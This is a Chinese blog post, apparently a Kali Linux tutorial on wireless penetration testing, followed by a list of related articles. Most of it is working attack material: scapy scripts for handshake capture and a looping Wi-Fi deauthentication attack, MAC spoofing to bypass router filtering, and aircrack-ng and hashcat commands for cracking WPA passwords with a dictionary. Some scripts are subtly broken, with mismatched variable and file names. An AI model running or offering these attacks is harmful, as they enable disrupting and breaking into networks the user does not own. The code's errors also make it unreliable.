kali无线渗透测试

最新推荐文章于 2023-11-02 22:29:11 发布
最新推荐文章于 2023-11-02 22:29:11 发布
阅读量1.2k 收藏 10
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42143925/article/details/105147963
版权

一、kali中的无线功能

  1. iwconfig 查看网卡连接情况
  2. airmon-ng start wlan0 在终端启动wlan0,设置成监听模式
  3. 查看网卡工作模式
from pythonwifi.iwlibs import Wireless 
wifi=Wireless('wlan0mon') 
print(wifi.getMode())
  1. airodump-ng wlan0mon 查看所有可以连接的无线网络
  • BSSID 热点的MAC地址
  • PWR 无线信号强度或水平
  • Beacons 无线发出的通告编号
  • ENC 加密方法,包括WPA2、WPA、WEP、OPEN
  • CH 工作频道
  • ACTH 使用的认证协议
  • ESSID 无线网络名称

uploading.4e448015.gif正在上传…重新上传取消uploading.4e448015.gif转存失败重新上传取消

二、kali无线测试

  1. 无线网络扫描器
from scapy.all import *
from scapy.layers.dot11 import Dot11Beacon
interface = 'wlan0mon'
ap_list = []
def info(fm):
    if fm.haslayer(Dot11Beacon):
        if fm.addr2 not in ap_list:
            ap_list.append(fm.addr2)
            print "SSID--> ",fm.info,"-- BSSID--> ",fm.addr2
sniff(iface=interface,prn=info)
  1. 无线数据嗅探器
from scapy.all import *
import subprocess
subprocess.call('airmon-ng start wlan0',shell=True)
iface="wlan0mon"
def dump_packet(pkt):
    print pkt.summary()
while True:
    sniff(iface=iface,prn=dump_packet,count=10,timeout=3,store=0)
  1. 无线网络的客户端扫描器
from scapy.all import *
import subprocess
from scapy.layers.dot11 import Dot11ProbeResp, Dot11ProbeReq
#subprocess.call('airmon-ng start wlan0',shell=True)
iface="wlan0mon"
probe_req=[]
ap_name=raw_input("please input the ap name")
print ap_name
def probesniff(fm):
    if fm.haslayer(Dot11ProbeReq):
        client_name=fm.info
        if client_name== ap_name:
            if fm.addr2 not in probe_req:
                print "New Probe Request:",client_name
                print "Mac ",fm.addr2
                probe_req.append(fm.addr2) 
sniff(iface=iface,prn=probesniff)
  1. 扫描隐藏的SSID
from scapy.all import *
from scapy.layers.dot11 import Dot11ProbeReq, Dot11AssoReq
iface = "wlan0mon"
def handle_packet(packet):
    if packet.haslayer(Dot11ProbeReq) or packet.haslayer(Dot11ProbeResp) or packet.haslayer(Dot11AssoReq):
        print "Found SSID "+packet.info
print "Sniffing on interface "+iface
sniff(iface=iface,prn=handle_packet)
  1. 绕过目标的MAC过滤机制

路由器限制只有MAC为特定的设备才能连接到网络中

ifconfig wlan0 down
ifconfig wlan0 hw ether CC:B0:DA:2D:44:80
ifconfig wlan0 up     //先关闭,修改,在开启    重启后会失效
  1. 捕获WPA数据包
import subprocess
from scapy.all import *
subprocess.call('airmon-ng start wlan0',shell=True)
packets = []
def handle_packet(pkt):
    if pkt.haslayer(EAPOL) and pkt.type == 2:
        packets.append(pkt)
        print packet.summary()
    if len(packets) == 4:
        wrpcap("wpa_handshake.pcap",packets)
        sys.exit(0)
print "sniffing on interface "+"wlan0mon"
sniff(iface="wlan0mon",prn=handle_packet)
//通过kali的Aircrack解捕获的数据包
aircrack-ng -w dic.txt wep_handshake.pcap
  1. Deauth攻击
#参数AP的BSSID 被踢设备的MAC地址
import time
from scapy.all import *
from construct.examples.protocols.ipstack import dest_unreachable_code
iface = "wlan0mon"
timeout=1
if len(sys.argv)<2:
    print sys.argv[0] + " <bssid> [client]"
    sys.exit(0)
else:
    bssid = sys.argv[1]
if len(sys.argv)==3:
    dest = sys.argv[2]
else:
    dest="ff:ff:ff:ff:ff:ff"
pkt=RadioTap()/Dot11(subtype=0xc,addr1=dest,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=3)
while True:
    print "Sending deauth to "+dest
    sendp(pkt,iface=iface)
    time.sleep(timeout)

三、aircrack-ng工具

1.aircrack-ng组件表

  • aircrack-ng 用于WEP和WPA-PSK密码的恢复,只要airodump-ng收集到足够数量的数据包,aircrack-ng就可以自动检测数据包,并判断是否可以破解
  • airmon-ng 用于改变网卡工作模式
  • airodump-ng 用于捕获802.11数据报文,以便于aircrack-ng破解
  • aireplay-ng 在进行WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的无线网络数据报文及流量
  • airserv-ng 可以将无线网卡连接至某一特定端口
  • airolib-ng 进行WPA Rainbow Table攻击时使用,用于建立特定的数据库文件
  • airdecap-ng 用于解开处于加密状态的数据包
  • tools 其他辅组工具,如:airdriver-ng、packetforge-ng

2.破解WPA的wifi密码

  • airmon-ng start wlan0 //设置成监听模式
  • airodump-ng wlan0mon //探测附近的热点
  • airodump-ng --channel 11 --bssid 热点的MAC地址 -w 热点的名字 wlan0mon //获取那个热点的数据包
  • aireplay-ng -0 1 -a 热点的MAC地址 -c 主机的MAC地址 wlan0mon //破解WPA/WPA2的关键是获取一个完整的握手包,使用deauth攻击,强迫下线,客户端自动重连
  • aircrack-ng 文件名.cap -w 字典.txt //通过字典暴力破解

3.hashcat破解WPA密码 (使用显卡加速)

  • cap2hccapx.exe 文件名.cap xxx.hccapx //把cap文件转化成hccapx文件
  • hashcat64.exe -m 2500 -a 0 文件.hccapx 字典.txt //使用hashcat破解密码

 

亮哥神话
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试基础(五) 获取WiFi密码
Venus_majian
06-20 73
使用Kali进行WiFi密码获取
无线渗透测试
qq_41648697的博客
09-24 1887
无线渗透测试,拿密码 前期准备 1.装有kali的虚拟机。 2.有监听功能的网卡(需要外置网卡,电脑自带网卡无监听功能)。 3.字典。(自带) 思路 设网卡为监听模式,扫描wifi,监听WiFi,泛洪攻击,拿握手包,握手包解密,密码拿到结束。 好了直接开始 1.杀掉会影响aircrack-ng的进程。 airmon-ng check kill 2.开启网卡(会出现一个新的接口wlan0mon...
kali入门到放弃系列二:破解wifi无线密码
d362658566的博客
12-08 1万+
kali破解wiki密码
从实践中学习Kali Linux渗透测试
qq_54480761的博客
01-15 1万+
目录 第一章 渗透测试概述 第二章 安装Kali Linux系统 第三章 配置Kali Linux 第一章 渗透测试概述 1.1 什么是渗透测试 1.1.1 黑盒测试 黑盒测试(Black-box Testing)也称为外部测试(External Testing)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏
Kali Linux无线网络渗透测试教程(大学霸内部资料)
m0_61101264的博客
11-02 342
介绍:本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试。教程包括无线网络监听、信息收集、路由器渗透测试、客户端渗透测试四大部分。内容涉及网络扫描、Wireshark抓包分析、WPS/WEP/WPA/WAP+Radius破解、漏洞扫描等技术。本教程基于Kali Linux专门讲解针对无线网络WiFi如何进行渗透测试。其中,详细揭示了无线网络的各种安全缺陷和容易被利用的漏洞。Kali Linux无线网络渗透测试
python scapy模块安装后引用错误,python – scapy未解决的引用
weixin_34163020的博客
03-25 1264
我正在使用scapy在python中编写的网络工具.作为IDE,我正在使用Pycharm.我的代码有效.因此,如果我运行它,一切都按预期工作.我的问题是PyCharm给了我一些错误.它标志着IP,TCP,以太网的所有用途……作为未定义的参考…我的代码的相关部分看起来像这样#!/usr/bin/env pythonfrom scapy.all import *......syn = IP(src=s...
kali linux网络扫描~无线网络扫描
十一、的博客
05-06 3131
理论知识 无线网络是一种特殊的局域网,也就是人们常说的Wi-Fi网络,由于它采用无线方式传输数据,所以采用方式也不同 无线网络是采用无线通信技术实现的网络 无线网络既包括允许用户建立远距离无线连接的全球语言和数据网络,也包括为近距离无线连接优化的红外线技术及射频技术,与有线网络的用途十分类似 无线网络与有线网络最大的不同在于传输媒介,无线网络利用无线电技术取代网线,可以和有线互为备份 一般情况下,无线网络有3中网络拓扑结构,分别是独立基本服务集网络、基本服务集网络和扩展服务集网络 独立基本服...
Kali无线渗透测试视频.zip
03-01
目录 1.1无线理论 1.2802.11帧类型 1.3WPA原理 2.1 KRACK 2.2 KRACK 3.Aircrack-ng 4.1直接使用字典破解 4.2Airolib-ng 4.3 J Ripper 5,Rouge AP攻击
kali无线渗透测试入门指南_有关渗透的知识_
09-29
Linux渗透知识 ,可以学到更多东西 建议查看
Kali Linux渗透测试技术详解
最新发布
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
Kali Linux无线网络渗透测kali安装教程
11-06
**Kali Linux无线网络渗透测试教程** Kali Linux是一款专为网络安全和渗透测试设计的操作系统,源自著名的BackTrack项目。自2013年BackTrack停更后,Kali Linux继承了其精神,集成了大量渗透测试、网络扫描和攻击...
Kali Linux无线网络渗透测试教程
12-25
Kali Linux无线网络渗透测试教程
scapy WiFi deauth攻击
anyingga7675的博客
11-01 765
成功的关键在于:发送deauth包的速度要快。 实测这样的代码是行不通的: pkt = RadioTap() / \ Dot11(subtype=0xc, addr1=dest, addr2=bssid, addr3=bssid) / \ Dot11Deauth(reason=3) timeout=1 while True: sendp(pkt, iface=iface) ...
独立研究型学习-关于kali中aircrack_ng的主要工具以及用法
TRUEENG的博客
12-12 923
Kali中使用Aircrack工具的记录,目的是完成学校 研究性学习的作业。
使用kali破解WIFI——Aircrack-ng
热门推荐
渗透测试
06-08 2万+
文章目录前言一、配置网卡1.查看网卡名2.设置监听模式二、获取目标流量1.扫描附近wifi2.监听目标流量三、破解wifi密码1.攻击指定客户端2.暴力破解总结 前言 Aircrack-ng是kali linux自带的网络测试工具之一,是评估WIFI网络安全性的一整套工具。 它侧重于WIFI安全的不同领域: 监控:数据包捕获和数据导出到文本文件,以供第三方工具进一步处理 攻击:通过数据包注入重播攻击,解除身份验证,虚假接入点等 测试:检查WIFI卡和驱动程序功能(捕获和注入) 破解:WEP和WPA PS
WIFI安全:利用Kali自带的Aircarck-ng工具包,以及Fluxion渗透wap/wap2无线WIFI,超详细。(前言:无线网卡选择,环境详尽信息)2020.01
a916489732的博客
03-27 4390
前言 无线网卡的选择 在Kali中,命令iw list查看网卡详尽信息或者命令lsusb查看USB接口设备。 无论我们选取哪款无线网卡做渗透测试,至少要满足以下两点:支持AP模式(可作为evil无线接入点)及monitor模式(可以进行抓包)。 而网卡芯片作为一个很重要的参考点,kali 现在支持的芯片还是不是很多,支持Linux的网卡市面上不是很多,支持无驱更是少之又少。 目前根据我在Kal...
使用 Aircrack-ng 进行 Wi-Fi 渗透
还没想好昵称的新建p的博客
10-18 3993
本文讲述了使用 Aircrack-ng 进行 Wi-Fi 渗透的实例。
Kali linux 学习笔记(三十二)无线渗透——AIRCRACK-NG 2020.3.12
闵行小鱼塘
03-12 995
AIRCRACK-NG工具使用
使用显卡+hashcat破解握手包
qq_29176323的博客
04-02 8583
1.将cap->hccapx 在线转换 https://hashcat.net/cap2hccapx/ aircrack-ng xxx.cap -j xxx 2. hashcat计算 工具 ps: aircrack-ng 是用cpu算的 效率远不如显卡 显卡驱动得安装好(linux的得谨慎),可以自己生成字典文件,常用就是八位数和手机号 hashcat 下载地址 github 下载发行版 解压后、make && make install 安装即可 计算 用字
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值